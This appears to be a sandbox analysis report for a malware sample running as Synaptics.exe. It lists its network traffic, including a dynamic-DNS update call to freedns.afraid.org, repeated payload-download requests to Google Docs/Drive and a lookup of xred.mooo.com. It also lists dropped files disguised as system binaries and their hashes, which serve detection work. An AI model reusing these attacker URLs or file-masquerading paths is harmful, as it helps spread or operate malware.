      Content-Type: application/octet-stream
      Content-MD5: PjrtHAukbJio72s77Ag5mA==
      Last-Modified: Thu, 31 Oct 2024 23:26:09 GMT
      ETag: 0x8DCFA0366D6C4CA
      x-ms-request-id: aa584fbb-e01e-0040-08ef-2b50d2000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 27 Nov 2024 01:15:22 GMT
      Connection: keep-alive
      TLS_version: UNKNOWN
      ms-cv: CASMicrosoftCV679c7153.0
      ms-cv-esi: CASMicrosoftCV679c7153.0
      X-RTag: RT
    • 69.42.215.252:80
      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
      http
      Synaptics.exe
      706 B
      415 B
      12
      4

      HTTP Request

      GET http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

      HTTP Response

      200
    • 142.250.187.206:443
      https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      tls, http
      Synaptics.exe
      1.7kB
      11.2kB
      12
      15

      HTTP Request

      GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

      HTTP Response

      303

      HTTP Request

      GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

      HTTP Response

      303

      HTTP Request

      GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

      HTTP Response

      303
    • 142.250.200.3:80
      http://c.pki.goog/r/r1.crl
      http
      Synaptics.exe
      348 B
      1.7kB
      5
      4

      HTTP Request

      GET http://c.pki.goog/r/r1.crl

      HTTP Response

      200
    • 142.250.200.3:80
      http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDHA1yyGqTiRQmAB36tPEBH
      http
      Synaptics.exe
      794 B
      3.1kB
      7
      6

      HTTP Request

      GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEGoFYJ0C3qQCbRh5xcgwPQ%3D

      HTTP Response

      200

      HTTP Request

      GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDHA1yyGqTiRQmAB36tPEBH

      HTTP Response

      200
    • 142.250.179.225:443
      https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      tls, http
      Synaptics.exe
      2.0kB
      14.5kB
      14
      21

      HTTP Request

      GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

      HTTP Response

      404

      HTTP Request

      GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

      HTTP Response

      404

      HTTP Request

      GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

      HTTP Response

      404
    • 88.221.134.83:80
      http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
      http
      399 B
      1.7kB
      4
      4

      HTTP Request

      GET http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl

      HTTP Response

      200
    • 95.100.245.144:80
      http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
      http
      445 B
      1.8kB
      5
      5

      HTTP Request

      GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl

      HTTP Response

      200
    • 8.8.8.8:53
      xred.mooo.com
      dns
      Synaptics.exe
      59 B
      118 B
      1
      1

      DNS Request

      xred.mooo.com

    • 8.8.8.8:53
      freedns.afraid.org
      dns
      Synaptics.exe
      64 B
      80 B
      1
      1

      DNS Request

      freedns.afraid.org

      DNS Response

      69.42.215.252

    • 8.8.8.8:53
      docs.google.com
      dns
      Synaptics.exe
      61 B
      77 B
      1
      1

      DNS Request

      docs.google.com

      DNS Response

      142.250.187.206

    • 8.8.8.8:53
      c.pki.goog
      dns
      Synaptics.exe
      56 B
      107 B
      1
      1

      DNS Request

      c.pki.goog

      DNS Response

      142.250.200.3

    • 8.8.8.8:53
      o.pki.goog
      dns
      Synaptics.exe
      56 B
      107 B
      1
      1

      DNS Request

      o.pki.goog

      DNS Response

      142.250.200.3

    • 8.8.8.8:53
      drive.usercontent.google.com
      dns
      Synaptics.exe
      74 B
      90 B
      1
      1

      DNS Request

      drive.usercontent.google.com

      DNS Response

      142.250.179.225

    • 8.8.8.8:53
      crl.microsoft.com
      dns
      63 B
      162 B
      1
      1

      DNS Request

      crl.microsoft.com

      DNS Response

      88.221.134.83
      88.221.134.146

    • 8.8.8.8:53
      www.microsoft.com
      dns
      63 B
      230 B
      1
      1

      DNS Request

      www.microsoft.com

      DNS Response

      95.100.245.144

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\ProgramData\Synaptics\Synaptics.exe

      Filesize

      3.3MB

      MD5

      e3a3e6d5bcdf3fe8c6c525429e401b1f

      SHA1

      a1b2370bd81715b63dd6268e301a7101d39d3ebc

      SHA256

      805c795be5f0324f0e1d2bca61beabaf1d1d054eca2ad0224588295bb9d41299

      SHA512

      be86d4785df2de0b0f4e74c9f56988d7df0dc6ed2bd2d2632b83266a73ed72491b50a3db557d83ce5cca65ed1b98c97d6c63a90045188896b02d2fa3484e8743

    • C:\Users\Admin\AppData\Local\Temp\s9QMut3j.xlsm

      Filesize

      22KB

      MD5

      72142dd2919c46f691a676cb273c34c2

      SHA1

      1a7e49ae3beea2ab0e5ffa5c871c32276bc0e887

      SHA256

      e01d1fada70005a26b33365a117dfd1b0c4c6d0e941f2e4856a1ef6fde15da00

      SHA512

      3828140efdcf1c9ec2d11cba332f1bf90cfea0e5d1419ced40870b258ca2b3c595f3a3bdf461240ab456728bba84356e48c54c1236a0718633ec25d891ec9b36

    • C:\Users\Admin\AppData\Local\Temp\s9QMut3j.xlsm

      Filesize

      17KB

      MD5

      e566fc53051035e1e6fd0ed1823de0f9

      SHA1

      00bc96c48b98676ecd67e81a6f1d7754e4156044

      SHA256

      8e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15

      SHA512

      a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04

    • C:\Windows\Resources\Themes\explorer.exe

      Filesize

      2.6MB

      MD5

      0c4affeb1489e7e5d679e6aed9760f7f

      SHA1

      b6e2e4a78db3f362acfefc30f2e8d94f832d9289

      SHA256

      30029729e153a417ff21f4a6cf66945e99e9a02e35c94ca07812dc293163bcb3

      SHA512

      186aa0959e3d5537ee117d3a2048c52e4490052b70f1358a7b8d1457e9fb854ebacfa82b61bcf044c0d8e71de10213a56bd3fdd5c78de91c20d5f54886c9eb14

    • C:\Windows\Resources\Themes\icsys.icn.exe

      Filesize

      2.6MB

      MD5

      4b81c8d3c1781a5450d47e893b843fda

      SHA1

      cf1486374f07285e5f322c77bcac15afa796b1d0

      SHA256

      4e66e9dbdae2842ed7e82e4a760efe02b5095ba9c9d5c14b8f2d7af4dda06949

      SHA512

      563004c3d69e852fe08acac123b8ec2ff0504807ad64e5c020c5aba0f825960c0bdcbf909bf265a2f88c66f4cc39edbde8dd2bde775cc6118e16e68570311c98

    • \Users\Admin\AppData\Local\Temp\._cache_805c795be5f0324f0e1d2bca61beabaf1d1d054eca2ad0224588295bb9d41299.exe

      Filesize

      2.6MB

      MD5

      b2126004e0cfc780aa831d168000852f

      SHA1

      4251dd9b19f247b83c4606b529693967a72c5f28

      SHA256

      693ac357b98fad2cbdb51b8bc1c793a0845944f15dea373b4c461065ec27a65e

      SHA512

      9d0d1f8928f9e24ceafb5c9cc78dafb25181844bc71caee71c5c239585db0a70a5e00f62478c20228747fa477d3833b46417eebfe075030f8768640588489755

    • \Users\Admin\AppData\Local\Temp\._cache_synaptics.exe

      Filesize

      25KB

      MD5

      430e3b88d419c28a6bad535825054894

      SHA1

      1657fd5ed8ab28f34df264f39cfc44f539704778

      SHA256

      eacba1545f69917190d13efea6558c23cdb04a13cfffeb2c5b27ffdf10781a2b

      SHA512

      728406141cbeed5357ced6073cd75c75afb24a916eed9bbdc64c034a8b2c080c110828cc241cc5ec1248d64c3a67487a88ad7d4351878d3ec0bec37a67de7256

    • \Windows\Resources\spoolsv.exe

      Filesize

      2.6MB

      MD5

      d1929226f5bef2d52cb5e351c25f5984

      SHA1

      840d781ada05101d65b2249bbe0f46e3c4aff3e8

      SHA256

      ac05b18c41d977a498d66c27b6618305d00ec5570567357c1822e3419c734109

      SHA512

      6e30d9aeea6cc7118c02dc7a3d70b466fd97d173fc2043432230ad7cce462adf233506796a5f4ef02fc825b497e155c8ffbc7defac06afb9105ba3f13a71aa61

    • \Windows\Resources\svchost.exe

      Filesize

      2.6MB

      MD5

      861c5dd8097bf9d9be9715d84670c5b5

      SHA1

      52864caa07749659054cf58cd67ad640f5d6a746

      SHA256

      dc76955d22f67c1c736bbd96838fa51b064dfff633fb169031cc1c80056381aa

      SHA512

      9f1361d8f1e48020c15a128f514954135ce86ba098c535fb9fd077e82b401233843416d1807d2faa6ce72644169ef923dbe8a03136cc0097dc7d86831f9d6b09

    • memory/1188-134-0x0000000003260000-0x0000000003876000-memory.dmp

      Filesize

      6.1MB

    • memory/1188-164-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/1188-220-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/1188-163-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/1188-165-0x0000000003260000-0x0000000003876000-memory.dmp

      Filesize

      6.1MB

    • memory/1188-121-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/1388-93-0x0000000003820000-0x0000000003E36000-memory.dmp

      Filesize

      6.1MB

    • memory/1388-160-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/1388-185-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/1388-72-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/1388-215-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/1648-139-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/1648-119-0x0000000003770000-0x0000000003D86000-memory.dmp

      Filesize

      6.1MB

    • memory/1648-96-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/2160-214-0x0000000000400000-0x000000000075E000-memory.dmp

      Filesize

      3.4MB

    • memory/2160-161-0x0000000000400000-0x000000000075E000-memory.dmp

      Filesize

      3.4MB

    • memory/2160-129-0x00000000056A0000-0x0000000005CB6000-memory.dmp

      Filesize

      6.1MB

    • memory/2160-37-0x00000000056A0000-0x0000000005CB6000-memory.dmp

      Filesize

      6.1MB

    • memory/2160-167-0x0000000000400000-0x000000000075E000-memory.dmp

      Filesize

      3.4MB

    • memory/2268-135-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/2268-137-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/2320-53-0x000000013FC50000-0x000000013FC5E000-memory.dmp

      Filesize

      56KB

    • memory/2516-29-0x0000000000400000-0x000000000075E000-memory.dmp

      Filesize

      3.4MB

    • memory/2516-17-0x00000000059F0000-0x0000000006006000-memory.dmp

      Filesize

      6.1MB

    • memory/2516-0-0x00000000003A0000-0x00000000003A1000-memory.dmp

      Filesize

      4KB

    • memory/2600-48-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2628-70-0x0000000003740000-0x0000000003D56000-memory.dmp

      Filesize

      6.1MB

    • memory/2628-141-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/2628-58-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/2692-57-0x0000000003330000-0x0000000003946000-memory.dmp

      Filesize

      6.1MB

    • memory/2692-143-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/2692-130-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/2692-38-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/3000-118-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/3000-18-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB
